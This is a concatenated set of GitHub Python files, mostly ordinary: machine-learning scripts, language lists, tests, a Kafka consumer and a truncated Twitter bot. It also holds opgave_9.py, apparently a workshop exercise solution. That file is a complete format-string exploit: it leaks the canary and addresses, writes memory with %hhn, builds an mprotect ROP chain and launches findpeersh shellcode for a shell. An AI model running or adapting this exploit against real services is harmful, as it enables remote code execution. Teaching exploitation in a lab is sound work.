torch.nn.Conv2d)]\nprint(flatidxs)\n#flatidxs.append(len(flat))\nprint(dict(m.features.named_children()).keys())\n\nprint('before')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n print(mean.mean(), mean.std())\n\nprev_mean = torch.tensor([1, 1, 1]).cuda()\nfor i in range(len(flatidxs)):\n print('computing', i)\n ms = []\n for b in batches:\n with torch.cuda.amp.autocast():\n out = flat[:flatidxs[i] + 2](b.cuda())\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n ms.append(mean)\n mean = torch.stack(ms, dim=0).mean(0).cuda()\n flat[flatidxs[i]].weight.data *= (prev_mean[None, :, None, None]\n / mean[:, None, None, None])\n flat[flatidxs[i]].bias.data /= mean\n prev_mean = mean\n\nprint('after')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n print(mean.mean(), mean.std())\n\nref = tchm.__dict__[model](\n 1000, pretrained='classification/imagenet').features.cuda()(batch[:128])\nprint((m.features(batch[:128])\n - ref / prev_mean[None, :, None, None]).abs().mean().item())\ntorch.save(m.state_dict(), f'{model}.pth')\n","repo_name":"Vermeille/Torchelie","sub_path":"scripts/stylevgg.py","file_name":"stylevgg.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"38"} +{"seq_id":"43464708948","text":"#支持向量回归机预测(径向基函数)\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import svm\n\ndataset = pd.read_csv('data_wp.csv')\ndata_input = dataset.iloc[:,:-1].values/1000 \ndata_output = dataset.loc[:,['pt']].values/1000 \ntrainlen = int(len(data_input)*0.8) \ntestlen = int(len(data_input)-trainlen) \n\nX_train = data_input[:trainlen].reshape(trainlen,-1) \ny_train = data_output[:trainlen].reshape(trainlen,1) \nX_test = data_input[trainlen:].reshape(testlen,-1) \ny_test = data_output[trainlen:].reshape(testlen,1) \n\nmodel_svm = svm.SVR(kernel='rbf')\nmodel_svm.fit(X_train,y_train)\npred = model_svm.predict(X_test)\n\nplt.figure(figsize=(12,18))\nplt.subplot(211)\nplt.plot(y_test,color='r')\nplt.plot(pred,color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict value'])\nplt.subplot(212)\nplt.plot(y_test[150:300],color='r')\nplt.plot(pred[150:300],color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict value'])\nplt.tight_layout()\nplt.show()","repo_name":"aduxhi/learnpython","sub_path":"load_pre2.py","file_name":"load_pre2.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18609264806","text":"# This is the list of language codes with the 'modern' level of support in CLDR\n# (compared to 'full', which contains many more languages). We use this as the\n# list of languages that we store specific name-to-code mappings for.\n\nCLDR_LANGUAGES = {\n 'af',\n 'am',\n 'ar',\n 'az',\n 'be',\n 'bg',\n 'bn',\n 'bs',\n 'ca',\n 'cs',\n 'cy',\n 'da',\n 'de',\n 'el',\n 'en',\n 'es',\n 'et',\n 'eu',\n 'fa',\n 'fi',\n 'fil',\n 'fo',\n 'fr',\n 'ga',\n 'gl',\n 'gu',\n 'he',\n 'hi',\n 'hr',\n 'hu',\n 'hy',\n 'id',\n 'is',\n 'it',\n 'ja',\n 'ka',\n 'kk',\n 'km',\n 'kn',\n 'ko',\n 'ky',\n 'lo',\n 'lt',\n 'lv',\n 'mk',\n 'ml',\n 'mn',\n 'mr',\n 'ms',\n 'my',\n 'nb',\n 'ne',\n 'nl',\n 'pa',\n 'pl',\n 'pt',\n 'ro',\n 'ru',\n 'si',\n 'sk',\n 'sl',\n 'sq',\n 'sr',\n 'sv',\n 'sw',\n 'ta',\n 'te',\n 'th',\n 'ti',\n 'to',\n 'tr',\n 'uk',\n 'und',\n 'ur',\n 'uz',\n 'vi',\n 'yue',\n 'zh',\n 'zu',\n}\n\n\n# These are the names languages that have the most entries on the English and\n# German Wiktionaries. Wiktionary only consistently identifies languages by their\n# name, making it important to be able to recognize the names.\n#\n# These lists of names are used in `tests/test_wikt_languages.py`.\nWIKT_LANGUAGE_NAMES = {}\n\nWIKT_LANGUAGE_NAMES['en'] = [\n \"Spanish\",\n \"French\",\n \"Latvian\",\n \"Latin\",\n \"English\",\n \"Mandarin\",\n \"Italian\",\n \"Portuguese\",\n \"Cantonese\",\n \"Japanese\",\n \"German\",\n \"Swedish\",\n \"Korean\",\n \"Serbo-Croatian\",\n \"Serbian\",\n \"Croatian\",\n \"Bosnian\",\n \"Finnish\",\n \"Vietnamese\",\n \"Dutch\",\n \"Galician\",\n \"Catalan\",\n \"Polish\",\n \"Danish\",\n \"Norwegian Nynorsk\",\n \"Turkish\",\n \"Romanian\",\n \"Lithuanian\",\n \"Ido\",\n \"Old French\",\n \"Czech\",\n \"Norwegian\",\n # Jèrriais -- same as Norman\n \"Esperanto\",\n \"Icelandic\",\n # Old Armenian\n \"Norwegian Bokmål\",\n \"Asturian\",\n \"Hungarian\",\n \"Proto-Germanic\",\n \"Russian\",\n \"Slovene\",\n \"Min Nan\",\n \"Scottish Gaelic\",\n \"Greek\",\n \"Irish\",\n \"Lojban\",\n \"Middle French\",\n \"Malay\",\n \"Luxembourgish\",\n \"Slovak\",\n \"Estonian\",\n \"Persian\",\n \"Venetian\",\n \"Old English\",\n \"Volapük\",\n \"Ladin\",\n \"Faroese\",\n \"Scots\",\n \"Interlingua\",\n \"Romansch\",\n \"Urdu\",\n # Middle Chinese\n \"Indonesian\",\n \"Swahili\",\n \"Middle English\",\n \"Occitan\",\n \"Welsh\",\n \"Old Norse\",\n \"Albanian\",\n \"Old Irish\",\n \"Old Saxon\",\n \"Lower Sorbian\",\n \"Afrikaans\",\n \"Ukrainian\",\n \"Proto-Slavic\",\n \"Ancient Greek\",\n \"Gothic\",\n \"Hawaiian\",\n \"Kurdish\",\n \"Tagalog\",\n \"Old High German\",\n \"Crimean Tatar\",\n \"Manx\",\n \"Sanskrit\",\n \"Hiligaynon\",\n \"West Frisian\",\n \"Hebrew\",\n \"Tok Pisin\",\n \"Proto-Indo-European\",\n \"Macedonian\",\n \"Novial\",\n \"Armenian\",\n \"Arabic\",\n \"Maltese\",\n \"Hakka\",\n \"Sicilian\",\n \"Ladino\",\n \"Basque\",\n \"Breton\",\n # Guernésiais -- same as Norman\n \"Vai\",\n \"Navajo\",\n \"Azeri\",\n \"Vilamovian\",\n # Tarantino\n \"Maori\",\n \"Friulian\",\n \"Hausa\",\n \"Haitian Creole\",\n \"Yiddish\",\n \"Tatar\",\n \"Proto-Malayo-Polynesian\",\n \"Aromanian\",\n \"Ottoman Turkish\",\n \"Old Provençal\",\n \"Northern Sami\",\n \"Dalmatian\",\n \"Bulgarian\",\n \"Neapolitan\",\n \"Cornish\",\n \"Middle Dutch\",\n \"Rapa Nui\",\n # Old Portuguese\n \"Egyptian Arabic\",\n \"Romani\",\n \"Tahitian\",\n \"Thai\",\n \"Limburgish\",\n \"Karelian\",\n \"Tajik\",\n \"Turkmen\",\n \"Kabardian\",\n \"Uzbek\",\n \"Samoan\",\n \"Mongolian\",\n \"Zulu\",\n \"Upper Sorbian\",\n \"Walloon\",\n # Proto-Finnic\n \"Frankish\",\n \"Mapudungun\",\n \"Pashto\",\n \"Low German\",\n \"Bashkir\",\n \"Kashubian\",\n \"Sranan Tongo\",\n \"Proto-Sino-Tibetan\",\n \"Norman\",\n \"Proto-Austronesian\",\n \"Marathi\",\n \"Rohingya\",\n \"Classical Nahuatl\",\n # Proto-Malayic\n # German Low German\n \"Fijian\",\n \"Zazaki\",\n \"Proto-Italic\",\n \"Old Dutch\",\n \"Egyptian\",\n \"Old Frisian\",\n \"Greenlandic\",\n \"Burmese\",\n \"Votic\",\n \"Ewe\",\n \"Cherokee\",\n \"Old Church Slavonic\",\n \"Quechua\",\n \"Mirandese\",\n \"Livonian\",\n \"Bengali\",\n \"Skolt Sami\",\n # Proto-Balto-Slavic\n \"Pitjantjatjara\",\n \"Georgian\",\n \"North Frisian\",\n \"Tetum\",\n \"Tongan\",\n # Mauritian Creole\n \"Torres Strait Creole\",\n \"Papiamentu\",\n \"Lao\",\n \"Malagasy\",\n \"Interlingue\",\n \"Aragonese\",\n \"Istriot\",\n \"Sumerian\",\n \"Proto-Celtic\",\n \"Võro\",\n # Proto-Polynesian\n \"Nepali\",\n \"Chickasaw\",\n \"Akkadian\",\n \"Middle Armenian\",\n \"Cimbrian\",\n \"Somali\",\n \"Sardinian\",\n \"Tocharian B\",\n \"Telugu\",\n \"Javanese\",\n \"Taos\",\n \"Proto-Semitic\",\n # Old Prussian\n \"Kyrgyz\",\n \"Corsican\",\n \"Veps\",\n \"Baluchi\",\n \"Middle Low German\",\n \"Middle High German\",\n \"Uyghur\",\n # Dutch Low Saxon\n \"Belarusian\",\n \"Guaraní\",\n \"Undetermined\",\n \"Inuktitut\",\n \"Tocharian A\",\n \"Nigerian Pidgin\",\n # Gallo\n # Saterland Frisian\n \"Punjabi\",\n \"Proto-Algonquian\",\n # Istro-Romanian\n \"Wiradhuri\",\n \"Sichuan Yi\",\n \"Wu\",\n # White Hmong\n \"Ugaritic\",\n \"Sundanese\",\n # Old East Slavic\n # Fala\n # Elfdalian\n \"Tamil\",\n \"Pijin\",\n \"Okinawan\",\n \"Kazakh\",\n \"Hindi\",\n \"Tuvan\",\n \"Polabian\",\n \"Aramaic\",\n \"Malayalam\",\n \"Kumyk\",\n \"Inari Sami\",\n \"Ilocano\",\n \"Tswana\",\n \"Libyan Arabic\",\n \"Latgalian\",\n \"Yakut\",\n \"Sindhi\",\n \"Khmer\",\n \"Gamilaraay\",\n \"Ojibwe\",\n \"Choctaw\",\n \"Chinese\",\n \"Chamorro\",\n \"Yucatec Maya\",\n \"Picard\",\n \"Ngarrindjeri\",\n \"Kott\",\n \"Ingrian\",\n # Crimean Gothic\n \"Chamicuro\",\n \"Rajasthani\",\n # Old Tupi\n \"Old Spanish\",\n \"Gagauz\",\n \"Extremaduran\",\n \"Chinook Jargon\",\n \"Cahuilla\",\n \"Kannada\",\n \"Iban\",\n \"American Sign Language\",\n \"Adyghe\",\n \"Warlpiri\",\n \"Tibetan\",\n \"Ossetian\",\n \"Meriam\",\n \"Marshallese\",\n \"Khakas\",\n \"Balinese\",\n \"Zhuang\",\n \"Tuvaluan\",\n \"Niuean\",\n \"Martuthunira\",\n \"Guugu Yimidhirr\",\n \"Chechen\",\n \"Campidanese Sardinian\",\n \"Tolai\",\n # Old Javanese\n \"Nahuatl\",\n \"Lombard\",\n \"West Coast Bajau\",\n \"Romagnol\",\n \"Middle Irish\",\n \"Yoruba\",\n \"Wangaaybuwan-Ngiyambaa\",\n # Old Swedish\n \"Lingala\",\n \"Fiji Hindi\",\n \"Shabo\",\n \"Sasak\",\n \"Judeo-Arabic\",\n \"Central Kurdish\",\n \"Bislama\",\n]\n\nWIKT_LANGUAGE_NAMES['de'] = [\n \"Deutsch\",\n \"Englisch\",\n \"Polnisch\",\n \"Italienisch\",\n \"Französisch\",\n \"Esperanto\",\n \"Schwedisch\",\n \"Lateinisch\",\n \"Tschechisch\",\n \"Katalanisch\",\n \"Spanisch\",\n \"Okzitanisch\",\n \"Ungarisch\",\n \"Litauisch\",\n \"Finnisch\",\n \"Russisch\",\n \"Altgriechisch\",\n \"Niederländisch\",\n \"Kurdisch\",\n \"Baskisch\",\n \"Armenisch\",\n \"Isländisch\",\n \"Bulgarisch\",\n \"Färöisch\",\n \"Dänisch\",\n \"Portugiesisch\",\n \"Slowakisch\",\n \"Türkisch\",\n \"Maori\",\n \"Albanisch\",\n \"Japanisch\",\n \"Norwegisch\",\n \"Irisch\",\n \"Koreanisch\",\n \"Chinesisch\",\n \"Venezianisch\",\n \"Friaulisch\",\n \"Serbisch\",\n \"Indonesisch\",\n \"Walisisch\",\n \"Arabisch\",\n \"Zentral-Nahuatl\",\n \"Neugriechisch\",\n \"Sumerisch\",\n \"Obersorbisch\",\n \"Sesotho\",\n \"Rumänisch\",\n \"Suaheli\",\n \"Persisch\",\n \"Krimtatarisch\",\n \"Plattdeutsch\",\n \"Prußisch\",\n \"Thai\",\n \"Bosnisch\",\n \"Sardisch\",\n \"Maltesisch\",\n \"Akkadisch\",\n \"Hawaiianisch\",\n \"Hebräisch\",\n \"Gotisch\",\n \"Afrikaans\",\n \"Rätoromanisch\",\n \"Tamil\",\n \"Bretonisch\",\n \"Ukrainisch\",\n \"Hindi\",\n \"Georgisch\",\n \"Panjabi\",\n \"Papiamentu\",\n \"Slowenisch\",\n \"Nauruisch\",\n \"Schottisch-Gälisch\",\n \"Balinesisch\",\n \"Estnisch\",\n \"Manx\",\n \"Korsisch\",\n # \"Frühneuhochdeutsch\",\n \"Lettisch\",\n \"isiZulu\",\n \"Tagalog\",\n \"Tok Pisin\",\n # \"Südpikenisch\",\n \"Kroatisch\",\n \"Niedersorbisch\",\n \"Kannada\",\n \"Guanche\",\n \"Weißrussisch\",\n \"Sanskrit\",\n \"Aserbaidschanisch\",\n \"Mittelhochdeutsch\",\n \"Laotisch\",\n \"Altnordisch\",\n \"Altenglisch\",\n \"Vietnamesisch\",\n \"Tadschikisch\",\n \"Samoanisch\",\n \"Mazedonisch\",\n \"Luxemburgisch\",\n \"Hethitisch\",\n # \"Yukatekisch\",\n \"Kaschubisch\",\n \"Wallonisch\",\n # \"Klassisches Nahuatl\",\n \"Telugu\",\n \"Rapanui\",\n \"Jiddisch\",\n \"Ido\",\n # \"Galicisch\",\n \"Volapük\",\n \"Bengalisch\",\n \"Mapudungun\",\n \"Lojban\",\n \"Tuvaluisch\",\n \"Gujarati\",\n \"Assamesisch\",\n]\n","repo_name":"SickGear/SickGear","sub_path":"lib/langcodes/language_lists.py","file_name":"language_lists.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"38"} +{"seq_id":"2881625826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\n\ncontext(arch=\"i386\", os=\"linux\")\n\nSHELLCODE = asm(shellcraft.findpeersh())\n\nr = remote('localhost', 20002)\nr.readline()\n\n# Canary = %134$\n# ebp (0xffd2da98) = %137$\n# ret addr (0x56557d4b) = %138$\n# socket = %139$\n\n# fmt base (0x56557000) = ret_addr - 0xd4b\n# buffer addr (0xffd2d86c) = ebp - 556\n# addr of ret (0xffd2da7c) = ebp - 28\n\nr.sendline(flat(\n '%134$08x', # Canary\n '%137$08x', # EBP1\n '%138$08x', # ret addr\n '%139$08x', # socket\n '%145$08x', # EBP2\n '%157$08x' # EBP3\n))\n\ncanary = int(r.recv(8), 16)\nebp1 = int(r.recv(8), 16)\nret = int(r.recv(8), 16)\nsocket = int(r.recv(8), 16)\nebp2 = int(r.recv(8), 16)\nebp3 = int(r.recv(8), 16)\nfmt_base = ret - 0xd4b\nbuffer = ebp1 - 556\nret_addr = ebp1 - 28\nr.recvline()\n\ndef send_receive(fmt):\n r.sendline(fmt)\n return r.recvline()\n\ndef make_pointer(addr):\n send_receive('A' * ((ebp2 & 0xff) + 0) + '%137$hhn')\n send_receive('A' * ((addr >> 0) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 1) + '%137$hhn')\n send_receive('A' * ((addr >> 8) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 2) + '%137$hhn')\n send_receive('A' * ((addr >> 16) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 3) + '%137$hhn')\n send_receive('A' * ((addr >> 24) & 0xff) + '%145$hhn')\n\ndef poke(addr, data):\n for i in range(len(data)):\n make_pointer(addr + i)\n send_receive('A' * data[i] + '%157$hhn')\n\ndef peek(addr):\n make_pointer(addr)\n r.sendline('%157$sTHE_END')\n return r.recvuntil('THE_END\\n')[:-8] + b'\\0'\n\nPAGE_SIZE = 0x1000\nPAGE_MASK = ~(PAGE_SIZE-1)\nshellcode = asm(shellcraft.findpeersh())\nshellcode_addr = ebp3 + 4\n\nadd_esp_76 = fmt_base + 0x00000d13 # add esp, 0x44 ; pop ebx ; pop ebp ; ret\npop2 = fmt_base + 0x00000928 # pop ebx ; pop ebp ; ret\nint_80 = fmt_base + 0x00000e88 # int 0x80 ; ret\npop_ebx = fmt_base + 0x00000739 # pop ebx ; ret\npop_eax = fmt_base + 0x00000d7b # pop eax ; ret\nles_ecx = fmt_base + 0x00000737 # les ecx, ptr [eax] ; pop ebx ; ret\nlea_edx = fmt_base + 0x00000a06 # lea edx, dword ptr [ebx - 0x110] ; mov dword ptr [esp], edx ; call eax\n\n\n# Value to put into ecx:es\npoke(fmt_base + 0x3000, p32(PAGE_SIZE) + b'\\0\\0')\n# Gadget to pivot the stack\npoke(ret_addr, p32(add_esp_76))\n# Shellcode\npoke(shellcode_addr, shellcode)\n\n# ROP chain\n# eax = SYS_mprotect\n# ebx = shellcode addr\n# ecx = len\n# edx = PROT_READ | PROT_WRITE | PROT_EXEC\npoke(ret_addr + 76 + 4, flat(\n #Put 7 into edx\n pop_ebx,\n (constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC) + 0x110,\n pop_eax,\n pop2,\n lea_edx,\n 0xdeadbeef,\n\n #Put 4096 into ecx AND address to mprotect into ebx\n pop_eax, # pop eax ; ret\n fmt_base + 0x3000, # ->eax\n les_ecx, # les ecx, ptr [eax] ; pop ebx ; ret\n shellcode_addr & PAGE_MASK, # address for mprotect must be on a page boundary\n\n pop_eax,\n int(constants.SYS_mprotect),\n int_80,\n shellcode_addr\n ))\n\nr.sendline('exit')\nr.interactive()\n","repo_name":"RobertLarsen/ProsaWorkshop","sub_path":"presentations/04-advanced-exploitation/assignments/solutions/opgave_9.py","file_name":"opgave_9.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"38"} +{"seq_id":"20397671119","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for the IWWB Searcher utility.\"\"\"\n\nfrom iwwb.eventlist.tests.base import IntegrationTestCase\nfrom iwwb.eventlist.interfaces import IIWWBSearcher\nfrom zope.component import getUtility\n\nimport mock\nimport unittest2 as unittest\n\n\nclass TestIWWBSearcherMocked(unittest.TestCase):\n \"\"\"Unit test on IWWBSearcher using mocked service results.\"\"\"\n\n @mock.patch('iwwb.eventlist.searcher.Client')\n def test_catch_exception_on_invalid_client(self, suds_client):\n \"\"\"Test an exception is caugth if suds.client.Client() returns one when\n trying to access an invalid SOAP client.\n \"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n suds_client.return_value = None\n suds_client.side_effect = Exception('Invalid SUDS client')\n\n with self.assertRaises(Exception):\n IWWBSearcher()._get_service_client()\n\n @mock.patch('iwwb.eventlist.searcher.IWWBSearcher._get_service_client')\n def test_return_empty_list_for_empty_results(self, _get_service_client):\n \"\"\"An empty list must be returned if we get empty SearchResults.\"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n # IWWB service returns '' if it doesn't find any results\n _get_service_client.return_value.service.GetFullResult.return_value.SearchResults = ''\n\n self.assertEquals(IWWBSearcher().get_results(dict(query='foo')), [])\n\n\nclass TestIWWBSearcherIntegration(IntegrationTestCase):\n \"\"\"Integration test for the IWWBSearcher utility that actually call the\n service and assert results.\n \"\"\"\n\n def setUp(self):\n \"\"\"Custom shared utility setup for tests.\"\"\"\n self.portal = self.layer['portal']\n self.searcher = getUtility(IIWWBSearcher)\n self.searcher.results_per_page = 2\n\n def test_get_results_empty(self):\n # Search for events in a city that doesn't exist\n query = dict(city='FooBar')\n self.assertEquals(self.searcher.get_results(query), [])\n\n def test_get_results_not_empty(self):\n # This search should return some results\n query = dict(city='Berlin')\n self.assertGreater(len(self.searcher.get_results(query)), 0)\n\n def test_get_results_format(self):\n query = dict(city='Berlin')\n results = self.searcher.get_results(query)\n result = results[0]\n\n # See if we can access the attribute values for a result (we can't test\n # other attributes because they are not mandatory), this should not\n # throw an Attribute error.\n result.Rank\n result.Type\n\n def test_get_results_false_parameters(self):\n # Try searching with a nonexistent parameter, the method should fail\n query = dict(foo='bar')\n try:\n self.searcher.get_results(query)\n except:\n pass\n else:\n self.fail(\"get_results did not raise an Exception!\")\n\n\ndef test_suite():\n \"\"\"This sets up a test suite that actually runs the tests in the class\n above.\"\"\"\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"collective/iwwb.eventlist","sub_path":"src/iwwb/eventlist/tests/test_searcher.py","file_name":"test_searcher.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34222842632","text":"import socket\nfrom confluent_kafka import Consumer\nimport json\nimport pandas as pd\nfrom io import StringIO\nimport os\nimport sys\nimport psycopg2\nfrom psycopg2 import sql\n\nconf = {'bootstrap.servers':'172.18.0.3:9092',\n 'group.id':\"topic-to-staging\"}\n\nconsumer1 = Consumer(conf)\n\ndef consumer_func(consumer,topics,max_messages=17000):\n data = []\n message_count = 0\n try:\n consumer.subscribe(topics)\n\n while message_count < max_messages:\n msg = consumer.poll(timeout =1.0)\n if msg is None : continue\n if msg.error():\n print(\"hata var\")\n else:\n json_data = msg.value().decode('utf-8')\n\n python_dict = json.loads(json_data)\n\n data.append(python_dict)\n\n message_count += 1\n except Exception as e:\n # Hata oluştuğunda ne yapılacağını belirleyebilirsiniz.\n print(f'Hata oluştu: {e}')\n return None \n finally:\n dataframe = pd.DataFrame(data)\n consumer.close()\n return dataframe\n\n\ncr_table_sql_script = (f\"CREATE TABLE IF NOT EXISTS staging.example\" +\n \"(Country varchar(200) NULL , Month varchar(50) NULL , Year int NULL, Visitor float NULL);\")\n\n\ndef write_dataframe_to_postgres(dataframe, schema_name='staging', table_name='example'):\n\n try:\n # Veritabanına bağlan\n connection = psycopg2.connect(\n host=\"localhost\",\n user=\"postgres\",\n password=\"1234\",\n database=\"postgres\"\n )\n\n # DataFrame'i CSV formatına dönüştür\n csv_data = dataframe.to_csv(index=False, header=False)\n\n # CSV formatındaki veriyi bir bellek tamponuna yaz\n csv_buffer = StringIO()\n csv_buffer.write(csv_data)\n csv_buffer.seek(0)\n\n # Cursor oluştur\n cursor = connection.cursor()\n cursor.execute(cr_table_sql_script)\n\n # CSV verisini PostgreSQL tablosuna kopyala\n copy_query = sql.SQL(\"COPY {}.{} FROM STDIN WITH CSV\").format(\n sql.Identifier(schema_name),\n sql.Identifier(table_name)\n )\n cursor.copy_expert(sql=copy_query, file=csv_buffer)\n connection.commit()\n print(\"DataFrame başarılı bir şekilde veritabanına aktarıldı.\")\n\n except psycopg2.Error as e:\n print(f\"PSQL Hatası: {e}\")\n\n finally:\n # Bağlantıyı kapat\n if 'connection' in locals():\n connection.close()\n\ndef main():\n try :\n dataframe = consumer_func(consumer=consumer1,topics=[\"staging\"],max_messages=17000)\n if dataframe is not None:\n # BURADA DATAFRAME ÜZERİNDE İŞLEMELER GERÇEKLEŞEBİLİR.\n print(dataframe.head())\n write_dataframe_to_postgres(dataframe)\n else:\n print(\"Topicten Veri alınırken bir hata oluştu\")\n except Exception as e:\n print(f\"Bir Hata Alınıdnı {e}\")\n finally:\n # Consumerı Kapatma İşlemi\n if consumer1 is not None:\n consumer1.close()\n\nif __name__ == '__main__':\n main()","repo_name":"afaruksargin/DataPipelineWithDockerAirflowKafka","sub_path":"py_script/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37648568391","text":"# search_data.py\n# Construct and preprocess data for model\n\nimport torch\nimport torchvision\nfrom torchvision import transforms, datasets\nfrom utils import *\nimport os\nimport random\n\n'''\n Retrieve images from CIFAR-10 dataset using torchvision\n'''\ndef get_cifar_data():\n transform = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform)\n \n # Construct DataLoaders for training and test sets\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=1, shuffle=False, num_workers=1)\n testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1, shuffle=False, num_workers=1)\n\n return trainloader, testloader, trainset\n\ndef index_dataset(trainset):\n feature_indexer = Indexer()\n add_dataset_features(trainset, feature_indexer)\n print(len(feature_indexer))\n\n'''\n Parse and retrieve data from train_path. Also construct an image indexer from index to image_path\n'''\ndef get_ml_data(train_path, train_cutoff=.95):\n indexer = Indexer()\n files = [os.path.join(train_path, p) for p in sorted(os.listdir(train_path))]\n for file in files:\n indexer.get_index(file)\n\n # Generate training and test set - 95% traning, 5% test\n a = [i for i in range(len(files))]\n random.shuffle(a)\n cutoff = int(len(files)*train_cutoff)\n train_data = a[:cutoff]\n test_data = a[cutoff:]\n return train_data, test_data, indexer","repo_name":"SanatSharma/RevSearch","sub_path":"search_data.py","file_name":"search_data.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"207776495","text":"import tweepy\r\nimport emojis\r\nimport random, io, time\r\n\r\nQTDEVENTOS = 3\r\nMAX_LINHAS = 5\r\n\r\narq = open(\"edicao.txt\", \"r\")\r\nfor linha in arq:\r\n edicao = linha\r\narq.close()\r\ntodosEmotes = []\r\nfrasesTXT = open(\"frases.txt\", \"r\")\r\nfrases = []\r\nfor linha in frasesTXT:\r\n frases.append(linha.strip())\r\nfrasesTXT.close()\r\ndesenhosTXT = io.open(\"desenhos.txt\", \"r\")\r\ndesenhos = []\r\nfor linha in desenhosTXT:\r\n desenhos.append(linha.strip())\r\nchavesTXT = open(\"chaves.txt\", \"r\")\r\nchaves = []\r\nfor linha in chavesTXT:\r\n chaves.append(linha.strip())\r\nprint(f'''\r\nConsumer key: {chaves[0]}\r\nConsumer secret: {chaves[1]}\r\nAccess key: {chaves[2]}\r\nAccess secret: {chaves[3]}\r\n\r\nChaves retiradas de 'chaves.txt'\r\nPara acessar as chaves vá em https://developer.twitter.com/en/apps\r\n''')\r\n\r\nconsumer_key = chaves[0]\r\nconsumer_secret = chaves[1]\r\naccess_key = chaves[2]\r\naccess_secret = chaves[3]\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\n\r\ndef esperar(tempo):\r\n print(f\"\\tAguardando {tempo} segundos\")\r\n time.sleep(tempo)\r\n\r\ndef tweetarXmin(texto, tempo):\r\n print(f\"\\tTweetando: \\n{texto}\")\r\n api.update_status(status = texto)\r\n esperar(tempo)\r\n\r\ndef tweetarXminReply(texto, tempo, tweet):\r\n print(f\"Respondendo o útlimo tweet:\\n{texto}\")\r\n api.update_status(status=texto, in_reply_to_status_id=tweet.id)\r\n esperar(tempo)\r\n\r\ndef removeDaListaVivos(lista1, lista2, morre):\r\n for linha in lista1:\r\n if (morre in linha):\r\n linha.remove(morre)\r\n lista2.remove(morre)\r\n return lista1, lista2\r\n\r\ndef anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api):\r\n metade = False\r\n contador = 0\r\n statusText = ''\r\n if (len(mortesDoDia) > 0):\r\n if (len(mortesDoDia) == 1):\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (mortesDoDia[0] in linha):\r\n statusText = f\"hoje fora ouvido apenas um tiro de canhão: \\n@{mortesDoDia[0]} do distrito {i}\\nserá isso bom ou ruim?\"\r\n break\r\n i += 1\r\n else:\r\n statusText = f'Hoje foram ouvidos {len(mortesDoDia)} tiros de canhão a distância:'\r\n for morto in mortesDoDia:\r\n statusText += f\"\\n@{morto} \"\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (morto in linha):\r\n statusText += f\"do distrito {i}\"\r\n break\r\n i += 1\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n metade = True\r\n tweetarXmin(statusText, 10)\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 30 * contador, tweet)\r\n statusText = \"\"\r\n if (not contador % MAX_LINHAS == 0):\r\n if (metade):\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXminReply(statusText, min(30 * contador, 300), tweet)\r\n else:\r\n tweetarXminReply(statusText, min(30), tweet)\r\n statusText = \"\"\r\n else:\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXmin(statusText, min(30 * contador, 300))\r\n else:\r\n tweetarXmin(statusText, 30)\r\n statusText = \"\"\r\n\r\ndef hungerGamesEvent():\r\n\r\n #region Post de inscrição dos tributos (+600 segs)\r\n statusText = f'''\r\nQUE COMECEM OS JOGOS VORAZES {edicao} \r\nPara participar comente algo nesse status, deixe seu grito de guerra, seu texto motivacional, qlqr coisa.\r\nVocê será notificado da sua participação\r\n\r\nRT/Fav pra fortalecer o bot <3\r\nAs inscrições terminam em 30 minutos\r\n#JogosVorazes\r\n'''\r\n arq = open(\"edicao.txt\", \"w\")\r\n arq.write(str(int(edicao) + 1))\r\n 